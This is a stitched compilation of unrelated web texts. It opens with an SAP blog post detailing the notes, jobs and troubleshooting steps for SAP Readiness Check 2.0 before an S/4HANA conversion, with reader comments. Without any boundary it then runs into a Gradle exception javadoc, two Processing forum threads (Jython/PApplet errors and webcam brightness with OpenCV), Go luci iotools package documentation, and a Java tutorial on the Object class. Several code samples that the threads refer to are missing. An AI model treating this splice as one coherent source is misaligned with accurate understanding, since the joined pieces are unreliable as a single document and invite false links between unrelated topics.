Updated 5 Oct 2019. Also valid for conversion to S/4HANA 1909
This blog details the steps for Readiness Check (RC) 2.0, step t2 of conversion to S/4HANA 1809 FPS0, FPS1 and FPS2. Readiness Check is an optional, high-level analysis that produces a Results Dashboard and a downloadable Results Document covering Active Business Functions, Add-On Compatibility, Custom Code Analysis, Recommended Fiori Apps, S/4HANA Sizing, Simplification Items, Business Process Analytics and Data Volume Management.
Download the Readiness Check User Guide for reference
Please find other blogs as follows:
Please find the process flow diagram with application of notes as below.
All steps are according to Note 2758146 – SAP Readiness Check 2.0 & Next Generation SAP Business Scenario Recommendations version 34. Click on Show Changes for revisions.
STEP 1: PREPARATION
De-implement any of the notes if they were implemented earlier. In case of ABAP class inconsistency, please clean up the class header in transaction SE24, specify the object and select Utilities => Regenerate sections in the change mode.
If you face issues with the above, please open an OSS message. Downloading and applying the latest version of the note yourself may cause a bigger issue, with a lot of time wasted later on.
You should have 6-8 weeks of transaction history (tcode ST03) in the production system or the system in which you want to execute the application analysis. Otherwise, SAP Readiness Check for SAP S/4HANA can return inaccurate or incomplete results.
If you have SAP Note 2310438 implemented in your system, de-implement note 2310438 first.
STEP 2: SET UP CUSTOM CODE ANALYSIS
Apply Note 2185390 – Custom Code Analyzer (includes manual steps)
This note will download other dependent notes, which in turn download further dependent notes, and so on. The number may vary depending on your patch level. The note requires manual steps, as below:
As per the manual steps above, in SE80 create package SYCM_MAIN.
Create subpackage SYCM_ANALYSIS.
Confirm the manual step. The note application will then prompt for another manual step depending on your SP level; it is only applicable to the narrow range of SAP_BASIS SP08 to SP11.
In SE11, create table WBINDEX. You will require a developer key and an object access key.
Add field PROGNAME and confirm manual step.
In SA38, run SAPRSEUC in the background, either now or after the optional step to run it in parallel to improve performance. This is a long-running job and runs single-threaded by default.
TIP: It is not required to run job SAPRSEUB, which updates the where-used list for the whole system; SAPRSEUC updates the where-used list for custom code only. Job SAPRSEUB can run for several days (11 days at one customer). The good thing is that if it is cancelled, it continues from the point it was cancelled, with an overhead of 20-30 minutes for every restart.
If you have issues in running this job the component for OSS message is BC-DWB-CEX.
STEP 3: (OPTIONAL) IMPROVE PERFORMANCE OF JOB SAPRSEUC
Apply Note 2667023 – Runtime of job EU_INIT or SAPRSEUB/SAPRSEUC, performance. Manual steps are in Note 2228460 – Runtime of job EU_INIT, SAPRSEUB, performance.
You will have to register the developer if needed, and register the object to get an access key; fill in as below:
Add 2 fields as below:
In SE38, open BSP_INIT_INDEX_CROS, Variant, Change, and add text elements as below. There are 7 programs and 1 class with text elements to be updated.
You may also be prompted for Programs WDY_INIT_INDEX_CROSS, SAPRSEUI, QSC_INDEX_ALL_PROXIES to add text elements.
After applying the note, the job runs with one background process and uses the number of dialog processes defined in (1) table RSEUPACTRL, as below: (2) add column ALLSERVER if it is blank, (3) mark X for parallel processing and (4) define the percentage of dialog processes to be used per time zone. If this is a sandbox and you want to finish the job as soon as possible, you can jack up these percentages.
You can now schedule the job SAPRSEUC if you decided to do the optional steps.
STEP 4: ENABLING S/4HANA SIZING DATA COLLECTION
Apply Note 1872170 – ABAP on HANA sizing report (S/4HANA, Suite on HANA…) – cannot be implemented in SNOTE. Please read the note.
Using tCode SNOTE, apply Note 2734952 – HANA memory Sizing report – Advanced correction 12. At the time of writing this is the latest; if there is a later note, please apply that note instead of 2734952.
Please note:
- Note requires minimum ST-PI 740/SP02 or 700,710/SP12 to apply the note.
- If you don’t want to apply ST-PI, then instead of applying this note, implement report ZNEWHDB_SIZE as described in Note 1872170 – ABAP on HANA sizing report. Please note that if you take this option, there are 3 programs and a function module to be created/updated to the latest code.
TIP: ST-PI is independent and doesn’t need other components or a stack.xml to apply; this saves a lot of manual work. IMPORTANT: Note 2758146 mentions that to include sizing in the analysis report dashboard, it is recommended to have ST-PI 740/SP07 or 700,710/SP17.
In tcode SE38, check that program /SDF/HDB_SIZING is available and you can even run it for test now.
Please use the below for troubleshooting if you run into issues. The same program runs later on when the analysis is scheduled and job RC_COLLECT_ANALYSIS_DATA is run, as per STEP 13.
This is related to 2 jobs we launch in step 13 – TMW_RC_HANAS_DATA_COLL & /SDF/HDB_SIZING_SM. If you have issues in running this job the component for OSS message is XX-SER-SAPSMP-ST.
STEP 5: ENABLING SIMPLIFICATION ITEM CHECK
Apply Note 2399707 – Simplification Item Check. This can be applied quickly. There are no manual corrections.
This note helps run 1 job we launch in step 13 – TMW_RC_SITEM_DATA_COLL. If you have issues in running this job, the component for the OSS message is CA-TRS-PRCK.
STEP 6: ENABLING BUSINESS PROCESS ANALYTICS ANALYSIS
Apply Note 2745851 – Business Process Improvement Content for SAP Readiness Check 2.0 and Next Generation SAP Business Scenario Recommendations Content. This note should be applied quickly in the productive client. There are no manual corrections.
This note is related to 1 job we launch in step 13 – TMW_RC_BPA_DATA_COLL. If you have issues in running this job the component for OSS message is SV-SMG-MON-BPM-ANA.
STEP 7: ENABLING IDOC ANALYSIS
Apply Note 2769657 – Interface Discovery for IDoc as part of Readiness Check
You need minimum ST-A/PI 01S_700/01S_731. Apply using SAINT. If you have issues in running this job the component for OSS message is SV-SMG-MON-BPM-DCM.
STEP 8: ENABLING DATA VOLUME MANAGEMENT ANALYSIS
The note can be implemented for ST-PI 740 SP01 or 700/710 SP09.
Apply Note 2612179 using SNOTE.
As per the manual instructions, follow this sequence:
- SNOTE apply Note 2611746 – DVM Create objects for APIs for triggering and monitoring ST14 analyses
- tCode SE38 run program NOTE_2611746
- SNOTE will apply Note 2612179 – DVM API to trigger and monitor DVM ST14 analyses for Readiness Check
- In SNOTE apply Note 2693666 – Enhance error handling when collecting DVM ST14 data for SAP S/4 HANA Readiness Check
TIP: If there are any errors in DVM data collection, refer to Note 1159758 – Data Volume Management: Central Preparation Note and also Note 2721530 – FAQ for collecting DVM data during S/4HANA Readiness Check.
This note is related to 4 jobs we launch in step 13 – TMW_RC_DVM_DATA_COLL, BP_APPLICATION_ANALYSIS_01, DANA_ANALYSIS, TAANA_ANALYSIS. If you have issues in running this job the component for OSS message is SV-SMG-DVM.
STEP 9: SETTING UP READINESS CHECK
Apply Note 2758146 – SAP Readiness Check 2.0 & Next Generation SAP Business Scenario Recommendations
This prompts for applying Note 2185390 – Custom Code Analyzer, which you already applied in an earlier step, so confirm.
The job related to Readiness Check master report we launch in step 13 is RC_COLLECT_ANALYSIS_DATA. If you have issues in running this job the component for OSS message is SV-SCS-S4R.
STEP 10: RUN BACKGROUND JOB IN DEV SYSTEM TO DOWNLOAD METADATA INFO
In SE38 run background job SYCM_DOWNLOAD_REPOSITORY_INFO. Define the variant to restrict to the required namespace.
Then run the program in background using this variant.
If the where-used list index for customer objects is not up to date you will get error below:
Please refer Note: 2655768 – Custom Code Analyzer – The where-used list index for customer objects is not up to date
STEP 11: MONITOR BACKGROUND JOB AND DOWNLOAD ZIP FILE
After the job is finished, in SE38 run SYCM_DOWNLOAD_REPOSITORY_INFO again and click on the button to download the zip file.
In case you get a dump here, the solution is: enter tCode SE38, open program LZEHPRC_CP_BB20UXX, and click on Change (you will need developer access). Go to menu option Utilities, Settings, select the option shown above, click OK, then Save and Activate the program. Unfortunately, you have to rerun the job from the beginning.
STEP 12: TRANSPORT 7+ NOTES TO PRODUCTION
In tCode SE01, release transport and using tCode STMS import into QAS and PROD systems in the landscape.
STEP 13: RUN BACKGROUND JOB IN PROD SYSTEM
In the productive client, tCode SE38 – RC_COLLECT_ANALYSIS_DATA: (1) select the target S/4HANA version, (2) Schedule Analysis, (3) Immediate and (4) OK. As per note 2758146, if you do not have the minimum ST-PI 700/710 SP17 or 740 SP07, then unmark the checkbox for HANA Sizing Data.
This will trigger a number of background jobs, as shown in the next step.
You should get message that Job RC_COLLECT_ANALYSIS_DATA is scheduled, and a series of messages.
TIP: If there are any errors in DVM data collection, refer to Note 1159758 – Data Volume Management: Central Preparation Note and also Note 2721530 – FAQ for collecting DVM data during S/4HANA Readiness Check.
If you get this error, apply Note 2443236 – SAP Readiness Check for SAP S/4HANA Business Process Improvement Content and also the needed ST-A/PI through SPAM.
STEP 14: MONITOR BACKGROUND JOB AND DOWNLOAD ZIP FILE
There are various jobs launched in order as below and you must check job logs to ensure the data was collected properly.
Job RC_COLLECT_ANALYSIS_DATA is the main job to collect analysis data.
Job TMW_RC_BPA_DATA_COLL is scheduled to collect Business Process Analytics data
Job TMW_RC_HANAS_DATA_COLL is scheduled to collect HANA Sizing data
Job TMW_RC_DVM_DATA_COLL is scheduled to collect Data Volume Management data
Job /SDF/HDB_SIZING_SM is scheduled to collect data for sizing
Job TMW_RC_SITEM_DATA_COLL is scheduled to collect Simplification Item relevance check data
Job BP_APPLICATION_ANALYSIS_NN is scheduled for DVM and triggers the TAANA and DANA analyses
Job TAANA_ANALYSIS is scheduled for large table analysis
Job DANA_ANALYSIS is scheduled for Data Volume Management analysis
After the jobs are finished, in SE38 run RC_COLLECT_ANALYSIS_DATA again and click on button to Download Analysis Data as shown in previous step.
ERROR SITUATION 1: If the job TMW_RC_HANAS_DATA_COLL gives error – internal Error! Set GF_INCLNO in 00F_SET_INCLNO, refer SAP Note 2809344 – Job TMW_RC_BPA_DATA_COLL is cancelled with error: “internal Error! Set GF_INCLNO in 00F_SET_INCLNO” which suggests to apply Note 2557474.
STEP 15: GENERATE READINESS CHECK RESULTS DASHBOARD
In SAP Launchpad (S-USER is required) url (1)
(2) Start New Analysis, (3) Analysis Name, (4) Customer, (5) Browse, (6) Select zip file RC2AnalysisDataSIDyyyymmdd.zip, (7) & (8) Terms of use, (9) Create.
Once the analysis is in ready state (about an hour), Open the analysis and use the zip file generated from program SYCM_DOWNLOAD_REPOSITORY_INFO and click (1) icon on the top right, (2) Browse, (3) select filename S4HMigrationRepositoryInfoSID.zip, (4) Terms of Use,(5) Update .
You can click on the wheel (1), switch on Update & Delete (2), input the email IDs (3) and click on Save (4). You can click on + to add more email IDs.
You can view the Results Dashboard as shown below.
Above steps complete the readiness check.
Readiness Check should be used as an interactive dashboard; its greatest benefit is online team collaboration. It is now possible to download the Readiness Check as a Word document, as in Readiness Check 1.0. The customer can provide access to any implementation partner (with a P-user, which can be easily created) or SAP employee. The access can also be revoked as needed.
ERROR SITUATION 1: In case you get the message below, it is likely that your system is not connected properly through Solution Manager to the SAP Support Portal. Please refer Note 2408911 and blog.
Use component for Readiness Check: SV-SCS-S4R to report problems during preparation or execution.
STEP 16: (OPTIONAL) ENABLE ATC CHECK RESULT EXPORT
Please follow the elaborate process to apply notes in Checked System as per blog – Conversion to S/4HANA 1809FPS0 – t5 – Custom Code Migration
Apply the required 4+ notes in the checked system, and apply the 3+ notes in the central checking system, which should be NetWeaver 7.52 or higher.
In the central checking system run tCode ATC, Runs, Manage Results. In the ATC Results Browser, select (1) the result series, right-click and select (2) Export File for (3) SAP Readiness Check for S/4HANA. You will download a file named <SID>_atc_findings.zip.
You can get the results in the Custom Code Analysis tile as shown below:
If you have issues in running this job the component for OSS message is BC-DWB-CEX.
STEP 17: (OPTIONAL) ENABLE CONSISTENCY CHECK RESULT EXPORT
Apply Note 2502552 – S4TC – SAP S/4HANA Conversion & Upgrade new Simplification Item Checks
There is an elaborate process to apply this note. Please refer the steps 1-5 in the Simplification Item Check blog – Conversion to S/4HANA 1809FPS0 – t4 – Simplification Item-Check
You can run the program RC_COLLECT_ANALYSIS_DATA selecting all items or below.
Download the zip file and simply click on the Update Analysis icon to upload the zip archive and update the analysis. The dashboard will retain the old data for other items and update the Simplification Item consistency check. If you have issues in running this job, the component for the OSS message is CA-TRS-PRCK.
You can also do this if, for example, only the sizing data needs to be updated: apply the latest sizing note, run program RC_COLLECT_ANALYSIS_DATA with a checkmark on HANA sizing, and then click on Update Analysis to upload the zip archive.
LANDSCAPE CONSIDERATIONS:
There is no option available to create the Readiness Check 2.0 through Solution Manager.
As shown in the main graphic, you could run the Custom Code analysis on the DEV system, so you analyze code that has never gone into production. If you want to analyze only code that has gone into production, please run the Custom Code analysis in PROD.
Another reason for running the Custom Code Analysis job in the DEV system is that building the where-used index may take a while in the PROD system.
TIP: During your regular maintenance patch update, please include ST-PI & ST-A/PI; that way some of the required notes are already applied. Both OCS packages ST-PI and ST-A/PI do not need the stack.xml and can be applied separately.
OTHER REFERENCES:
Readiness Check Help Portal
Readiness Check User Guide
Note 2758146 – SAP Readiness Check 2.0 & Next Generation SAP Business Scenario Recommendations
Readiness Check Jam Group
Readiness Check video
Expert Guided Implementation (EGI) <===== sessions on SAP Learning Hub, SAP Enterprise Support Edition*
*Only SAP Enterprise Support customers are eligible to attend this remote training workshop. Please note that to access the SAP Learning Hub, edition for SAP Enterprise Support, a one-time registration is required. A detailed step-by-step guide can be found here.
FAQ blog – SAP Readiness Check 2.0 for SAP S/4HANA – FAQ & What’s New in Releases
Thank you. Hope you enjoyed the blog !
Mahesh Sardesai
Product Expert – S/4HANA
Hello Mahesh,
Great effort on highlighting all steps for Readiness Check 2.0.
But I would like to highlight few things here. The last screenshot of dashboard, is really from new application of SAP Readiness check 2.0? Because I got different visualization in dashboard.
I think for SAP Readiness Check 2.0 we have to use URL, not as mentioned in your steps.
Also, we first need to upload only the RC_COLLECT_ANALYSIS_DATA file while creating the analysis report (there is no provision to upload both files at the same time), and once it is in ready state we upload the SYCM_DOWNLOAD_REPOSITORY_INFO file by clicking on the left-hand "update analysis" icon. It will update the report.
I feel steps mentioned here are bit misinforming as it highlights some part of SAP Readiness Check 1.0 as well.
Regards,
Dennis
Hi Dennis,
I clicked on publish too soon, when it wasn’t ready. It has been updated now. Thanks.
Hi Mahesh,
I came to step 16 without any problem and while uploading my RC2AnalysisDataRRR20190530.zip, I received this warning: “Analysis creation failed: The uploaded file is not valid. Check that the file is downloaded using report RC_COLLECT_ANALYSIS_DATA.”
I don't know what to do or where to find the reason.
Can you help me please?
Best regards
Slavomír Hronec
Hi,
There has been revision to the Note 2758146 (version 18) on 29 May.
Please download version 18 and run the analysis again.
Hi Mahesh,
I executed a readiness check 2.0 and I got some problems:
thank you in advance
Simone
Hi Simone,
have you got any reply on the topic "why don't I get any information in the business process discovery section"?
We have the same problem, but I can't get any information on how to solve that issue.
Thanks & Regards,
Manuel
Sorry Manuel,
but my issue is not solved.
If I’ll discover the cause, I’ll share with you.
Regards
Simone
Hi Simone,
Please note that this particular note is to be applied in the productive client; if you have applied it in client 000 it may not pull data. Also note, per the main graphic, that the program RC_COLLECT_ANALYSIS_DATA has to be run in the productive client, not 000 or another client.
Thanks,
Thank you Mahesh for your reply.
About first point, I charged the productive statistics on TST system and I got the infos.
About the second, ok: I’ll analyze the summary from the ZNEWHDB_SIZE log.
On referring to point 3, I applied the suggested SAP Note in the used client and executed the RC* tool on the correct client, but the business process analysis is unavailable in both readiness checks, because the bpa.xml is quite empty.
Simone
HI Mahesh
is it possible to run the readiness check in a CCS (SAP Utilities) version 6.03?
SAP ECC is installed in another instance and will be kept as is.
In CCS there are thousands of developments and readiness would help in the evaluation
another question: my customer is live in S/4HANA 1511. Can I run readiness check?
thanks a lot in advance
Bruno
Hi,
Readiness Check is primarily for Conversion of ERP to S/4HANA. It looks like you would like to analyse custom code and it would be good to do the check for Custom Code Migration Worklist and this will require Netweaver 7.52 system.
You can do the readiness check for the upgrade to get a summary report, but being already on S/4HANA the benefit here is reduced. You could prepare the simplification list itself by applying note 2502552; as you already have the TCI note in the system, it may take little effort to get to the final list.
Dear Mahesh thank you very much
all the best Bruno
Hi all,
do you – really?! – call this a decent "Readiness check"? I'd assume that nothing is ready, i.e. prepared, from the vendor. "Run simple" by delegating the work, trial and error to the customer.
What a foreseeable mess…
Hi Joerg,
Sorry that the tool did not meet your expectations. It has been tested well with our testing team and partners. Please let us know issues you are facing so we can consider for improvement.
Hi @ all,
does anyone have an idea why the business process discovery section doesn't deliver any information?
In every section of Readiness Check 2.0 I receive information, except for the business process discovery section.
Would be great to get an answer how to solve this issue.
Thanks & Regards,
Manuel
Great Blog 🙂 Thank you.
Is there any Blog how to implement the RC 2.0 on BW systems?
Kind regards,
Karsten
Hi Karsten,
Karsten Kautz RC 2.0 is not available for BW systems.
Best regards
Renaud
HI ,
when you click on the Create Result Document , we will get the below error .
HTTP Status 504 – An internal application error occurred. Request: 1234567 supportportal:supportshell
Regards
Prabhu
Hi Allamprabhu,
“Create Result Document” is only valid for Readiness Check 1.0 and is not available for Readiness Check 2.0. Also, the old readiness check is being discontinued, so you will have to create an OSS message to check if it is still available.
Hi,
We’re pursuing the below approach for S/4HANA conversion. Having said that, are Readiness Check 2.0 and the simplification item checks required or applicable to this scenario as well?
“Selective data transition using Landscape transformation”
Regards,
Dheeraj
Hi Dheeraj,
Readiness Check is applicable to the conversion scenario. However, if you have an ECC system you can still run it to get information relevant to S/4HANA: what add-ons are installed, what business functions you have activated, and what simplification items are applicable to your scenario. Some of these may be redundant.
However, you have to ignore certain information that may no longer be worth using, for example sizing.
Thanks for this great blog !
Result Document will be available mid-September on RC 2.0
For custom full code analysis you will need to have a 7.52 system to be able to use ABAP Test Cockpit
Best regards
HI Mahesh,
thank you for answering my question .
TMW_RC_BPA_DATA_COLL: the job is failing due to a memory issue. I have increased the memory via report RSMEMORY, but even then the issue is not solved.
internal table PROGRAM=/SSA/EKP/FORM=09F_COLLECT_DATA=LT_PURCH2_DATA IL_03
could not be further extended
The amount of storage space (in bytes) filled at termination time was:
Roll area: 11958080
Extended memory (EM): 4001312480
Assigned memory (HEAP): 3999415488
Page area: 32768
Maximum address space: 4294967295
TSV_TNEW_PAGE_ALLOC_FAILED
/SSA/EKP
09F_COLLECT_DATA
Hi Allamprabhu,
The error could be related to the Business Process Analytics check (BPA data coll), as you mentioned. Some customers have reported this issue and there has been a correction on this recently. Please download the latest version of the changed notes and try again.
Serializable

public class StopExecutionException extends RuntimeException

A StopExecutionException is thrown by an Action or task action closure to stop execution of the current task and start execution of the next task. This allows, for example, precondition actions to be added to a task which abort execution of the task if the preconditions are not met.

Note that throwing this exception does not fail the execution of the task or the build.
Hi there dear enthusiasts,
I have been trying to run a couple of processing (java based) sketches using Jython. However, in both cases I am getting similar errors which I can not resolve. Here is my first piece of very basic code:
from processing.core import PApplet

class HelloProcessing(PApplet):
    def setup(self):
        global p
        p = self
        p.size(350, 350)

    def draw(self):
        p.fill(p.random(255))
        p.rect(150, 150, 50, 50)

if __name__ == '__main__':
    import pawt
    pawt.test(HelloProcessing())
I get the following errors:
Traceback (most recent call last):
  File "/home/nimanamjouyan/workspace/LearningPyDev/src/helloProcessing.py", line 15, in <module>
    pawt.test(HelloProcessing())
  File "/home/nimanamjouyan/jython-installer-2.7.0/Lib/pawt/__init__.py", line 9, in test
    f.add('Center', panel)
TypeError: add(): 1st arg can't be coerced to String, java.awt.Component
The other piece of code I am trying to run is this:
The error I am getting this time is:
Traceback (most recent call last):
  File "/home/nimanamjouyan/workspace/LearningPyDev/src/RandBoxesTest.py", line 54, in <module>
    frame.add(panel)
TypeError: add(): 1st arg can't be coerced to java.awt.PopupMenu, java.awt.Component
These two errors seem to be very similar. What am I doing wrong here? Is java.awt incompatible with the class that I am passing? How can I fix this?
Any help is much appreciated.
Answers
Hi there,
I actually found a solution which makes the program work, but it does not address the problem. The "core.jar" file which I was using was from Processing 3.2.3. I replaced it with the "core.jar" from Processing 1.5.1 and 2.2.1, and with both of them I no longer got the error and the program worked.
This is trying to add a PApplet to a frame. If PApplet isn't one of Component or PopupMenu then you'll have trouble. And PApplet changed sometime in P3, away from extending Applet:
processing-3.1.1/core/library/core.jar
public class PApplet implements PConstants
processing-3.0b7/core/library/core.jar
public class PApplet implements PConstants
processing-2.2.1/core/library/core.jar
public class PApplet extends Applet implements PConstants, Runnable, MouseListener, MouseWheelListener, MouseMotionListener, KeyListener, FocusListener {...
I've repeated that zillion times already: :-<
Latest version which still extends Java's Applet class is 3.0a5! :(|)
Though I would still recommend using version 2.2.1
Thanks guys!!!! Also I was wondering why my mouse functions like "mousePressed" are not working. I changed the first code a little bit to make the colour of the rectangle dependent on the press of the mouse:
But it does not seem to work. any ideas why not?
I have no idea what that pawt is for.
But AFAIK, class PApplet needs its methods main() or runSketch() in order to "ignite" it! :-?
The mouse does not work in my other longer code which is not using pawt. Would you please point me to an example or let me know how I can use "mousePressed" and other Processing mouse functions? Also I have not used main() or runSketch(), but Processing functions such as fill() and rect() seem to work, while the mouse stuff does not. Any ideas why?
Sorry, I barely know anything about Python or its "ecosystem". X_X
That's just my Java Mode knowledge.
What its pre-processor does to transpile a ".pde" to an actual ".java" file. ~O)
I am not really sure about the pre-processor either. I really want to make this code work on eclipse so then I can integrate it with other python code and run it on a server as a GUI ( I am referring to the longer piece of code). Nonetheless, if you find anything or any guides relevant to my case, I would really appreciate it, if you could let me know. I really want to get the mouse working
In order to use Processing code on Eclipse or other IDE's, it's important to know how PDE's pre-processor works. That's all I know. 8-|
I see. I actually switched "mousePressed" with "mouseButton" and specified the button and it works! For some reason "mousePressed" is not working. Moreover, when I use print(mousePressed) I get something weird like:
<bound method Sketch.mousePressed of org.python.proxies.__main__$Sketch$0[panel0,0,0,300x300,layout=java.awt.FlowLayout]>
But when I do the same with "mouseButton" I actually get an integer value. It seems that some functions are not working? I am not exactly sure what is going on.
In Java, fields, methods & classes, each got its own namespace.
It means we can use the same label name for each of those 3 categories at the same time!
However, we don't have separate namespaces for JS. And I believe that's true for Python as well. :-@
Hi! I have the same problem, did you fix it? I need help too!
Hello everybody, I want to be able to adjust the brightness and contrast of color and gray images while the webcam is live. This is my code:
import processing.video.*;
import g4p_controls.*;
import java.awt.Font;
import gab.opencv.*;

OpenCV opencv;
PFont f;
boolean filterT = false;
Capture cam;
GButton btnFilterT;
int n = 1;

void setup() {
  size(1024, 768);
  f = createFont("Arial", 48, true);
  btnFilterT = new GButton(this, 740, 50, 140, 20);
  btnFilterT.setText("On");
  btnFilterT.setLocalColorScheme(GCScheme.GREEN_SCHEME);
  cam = new Capture(this, 640, 480);
  cam.start();
}

void draw() {
  if (cam.available() == true) {
    cam.read();
  }
  pushMatrix();
  scale(-1, 1);
  image(cam.get(), -width, 0, width, height);
  popMatrix();
  opencv = new OpenCV(this, cam);
  opencv.loadImage(cam);
  if (filterT == true) {
    opencv.brightness((int) map(mouseX, 0, width, -255, 255));
    image(opencv.getOutput(), 0, 0, width, height);
  }
}

public void handleButtonEvents(GButton button, GEvent event) {
  if (button == btnFilterT) {
    filterT = true;
  }
}
I have two problems:
If I press the T button to start the brightness and contrast in gray, the screen flips over and is no longer mirrored.
How can I have brightness and contrast with the mirrored video?
How can I have brightness and contrast of the webcam in color?
thank you
Answers
To answer the first question: I think the reason why the screen flips over is that you only perform push, scale and pop on cam.get() but not on opencv.getOutput().
Thanks Andreas_Ref, I have tried to change:
image(opencv.getOutput(), -width, 0, width, height);
but it does not work. Anyone have any ideas to suggest?
thanks
I was hoping somebody in the community would have answered this question by now. I tried myself but I failed.
Next I am assuming opencv.getOutput() returns a PImage object.
The code next is a dirty test suggestion, partial code and un-tested. Also explore previous post using scale:
I am interested to know if this will work.
Kf
Thank you very much for your help kfrajer!
Your example works fine!
But then when I slightly changed it started to does not work Opencv.brightness ();
Where am I wrong?
thanks
That is very odd. From your previous code, I notice that the inversion is observed only on the image that you draw in line 113, and it is shown only for a split second. I removed G4P and OpenCV thinking they were changing the object, but my luck didn't change. Oddly enough, the previous example did work, so it seems....
I kinda gave up because I couldn't get it to work using scale at the end. It is like image() ignores the scale parameter despite it being called before. Very very odd.
I have a solution. Sketch below. Notice I assume the sketch and image have the same size.
Kf
Strange. I'm actually trying to understand -- should the previous issue be reported as a bug? Interesting solution, @kfrajer.
I re-tested all the code above and none works. I am not sure if it is a bug or if not being used properly. i think using the default imageMode leads to confusion. I came up with the following example. I create a copy of the current cam image and I display it twice, one inside the push/pop bloc and the second one outside in an untouched reference frame. Notice that I am using imageMode(CENTER). I conclude the one inside the block works.
Kf
This post also works for this case, related to horizontal flipping (Tested in Java but not using G4P... it should work nevertheless):
Kf
import "go.chromium.org/luci/common/iotools"
Package iotools contains a collection of I/O-related utility structs and methods.
bufferingreaderat.go byteslicereader.go chainreader.go countingWriter.go countingreader.go doc.go panicwriter.go responsewriter.go
ErrPanicWriter is panic'd from the Writer provided to the callback in WriteTracker in the event of an io error.
NewBufferingReaderAt returns an io.ReaderAt that reads data in blocks of configurable size and keeps LRU of recently read blocks.
It is great for cases when data is read sequentially from an io.ReaderAt (e.g. when extracting files using zip.Reader), since by setting a large block size we can effectively do lookahead reads.
For example, zip.Reader reads data in 4096-byte chunks by default. By setting the block size to 512 KB and the LRU size to 1, we reduce the number of read operations significantly (128x), in exchange for a modest amount of RAM.
The reader is safe to use concurrently (just like any ReaderAt), but beware that the LRU is shared and all reads from the underlying reader happen under the lock, so multiple goroutines may end up slowing each other down.
WriteTracker helps to write complex writer routines correctly.
This wraps a Writer with an implementation where any Write method will panic with the ErrPanicWriter error, catch that panic, and return the original io error as well as the number of written bytes.
This means that the callback can use its Writer without tracking the number of bytes written, nor any io errors (i.e. it can ignore the return values from write operations entirely).
If no io errors are encountered, this will return the callback's error and the number of written bytes.
ByteSliceReader is an io.Reader and io.ByteReader implementation that reads and mutates an underlying byte slice.
func (r *ByteSliceReader) Read(buf []byte) (int, error)
Read implements io.Reader.
func (r *ByteSliceReader) ReadByte() (byte, error)
ReadByte implements io.ByteReader.
ChainReader is an io.Reader that consumes data sequentially from independent arrays of data to appear as if they were one single concatenated data source.
The underlying io.Reader will be mutated during operation.
func (cr *ChainReader) Read(p []byte) (int, error)
Read implements io.Reader.
func (cr ChainReader) ReadByte() (byte, error)
ReadByte implements io.ByteReader.
func (cr ChainReader) Remaining() int64
Remaining calculates the amount of data left in the ChainReader. It will panic if an error condition in RemainingErr is encountered.
func (cr ChainReader) RemainingErr() (int64, error)
RemainingErr returns the amount of data left in the ChainReader. An error is returned if any reader in the chain is not either nil or a bytes.Reader.
Note that this method iterates over all readers in the chain each time that it's called.
CountingReader is an io.Reader that counts the number of bytes that are read.
func (c *CountingReader) Read(buf []byte) (int, error)
Read implements io.Reader.
func (c *CountingReader) ReadByte() (byte, error)
ReadByte implements io.ByteReader.
type CountingWriter struct {
    io.Writer // The underlying io.Writer.

    // Count is the number of bytes that have been written.
    Count int64
    // contains filtered or unexported fields
}
CountingWriter is an io.Writer that counts the number of bytes that are written.
func (c *CountingWriter) Write(buf []byte) (int, error)
Write implements io.Writer.
func (c *CountingWriter) WriteByte(b byte) error
WriteByte implements io.ByteWriter.
ResponseWriter wraps a given http.ResponseWriter, records its status code and response size.
Assumes all writes are externally synchronized.
func NewResponseWriter(rw http.ResponseWriter) *ResponseWriter
NewResponseWriter constructs a ResponseWriter that wraps given 'rw' and tracks how much data was written to it and what status code was set.
func (rw *ResponseWriter) Flush()
Flush sends any buffered data to the client.
func (rw *ResponseWriter) Header() http.Header
Header returns the header map that will be sent by WriteHeader.
func (rw *ResponseWriter) ResponseSize() int64
ResponseSize is size of the response body written so far.
func (rw *ResponseWriter) Status() int
Status is the HTTP status code set in the response.
func (rw *ResponseWriter) Write(buf []byte) (int, error)
Write writes the data to the connection as part of an HTTP reply.
func (rw *ResponseWriter) WriteHeader(code int)
WriteHeader sends an HTTP response header with the provided status code.
Package iotools imports 6 packages and is imported by 19 packages. Updated 2019-10-14.
Exploring the java.lang Library
The java.lang library contains classes and interfaces that are fundamental to every Java program. This package is imported implicitly by the compiler into all programs, so we do not use the import statement to explicitly include it. Because it is included tacitly, the significance of its impact often goes unnoticed. The most important class of this library is Object. Every class in Java is a subclass of this class, either directly or indirectly. In other words, Object is the parent of all the classes in Java. Apart from this primordial class, the package contains numerous other classes and interfaces. This article takes on just two of them, the Object class and the collection of wrapper classes of this package, to get a glimpse of the key aspects of this library.
The Object Class
A Java programmer uses inheritance to create classes from existing classes. The primary motivation behind inheritance is to extend the functionality of a parent class. That means, if a class has, say, two methods:
class A {
    void method1() { }
    void method2() { }
}
and another class, B, extends class A, and has a single method:
class B extends A {
    // class A methods are inherited automatically
    void method3() { }
}
class B extends the quality of class A by inheriting the methods defined in class A, in addition to the methods defined within itself.
This is what happens with the Object class. The Object class methods are implicitly inherited by all Java classes. But the difference is that we do not explicitly use the extends keyword; instead, it is implied by default. In this case, the responsibility of applying the inheritance hierarchy to Java classes rests with the compiler. However, there is no harm in doing so explicitly, although it is utterly unnecessary.
public class Employee extends Object {
    // ...
}
In relation to this, note that the Employee class never inherits the constructor of the Object class as per the object-oriented principle of superclass-subclass relationship. The Object constructor is implicitly called by the Employee constructor as soon as its objects are created. It is the first task of any subclass constructor to call its immediate parent class constructor, either explicitly or implicitly, to ensure that the instance variables inherited from the superclass are initialized properly before using them.
public Employee() {
    // ...implicit call to the superclass constructor
}

public Employee() {
    // ...explicit call to the superclass constructor
    super();
}
The Object class provides a number of methods that are universally applicable to all its subclasses. The most common of these is the toString() method. This method returns the string representation of an object. It is particularly useful for debugging purposes. It is recommended that every class override this method to get a customized string representation of the object. By default, the toString() method returns the package-qualified class name, concatenated with an '@' and the hexadecimal hash code of the instance. As a result, the following two operations invariably produce the same string representation:
employeeObject.toString();
employeeObject.getClass().getName() + "@" +
    Integer.toHexString(employeeObject.hashCode());
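A minimal sketch of the recommended override (the class and its fields are illustrative):

```java
// Overriding toString() replaces the default "package.Class@hashcode"
// form with a readable representation.
public class Employee {
    private final String name;
    private final int id;

    public Employee(String name, int id) {
        this.name = name;
        this.id = id;
    }

    @Override
    public String toString() {
        return "Employee[name=" + name + ", id=" + id + "]";
    }

    public static void main(String[] args) {
        System.out.println(new Employee("Ada", 7)); // println calls toString()
    }
}
```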
The hash code is an integer that helps identify an object. Two variables that refer to the same object naturally have the same hash code, although two distinct objects can also collide on a hash code, so an equal hash code alone does not prove identity. By default, a hash code is typically derived by converting the internal address of the object into an integer.
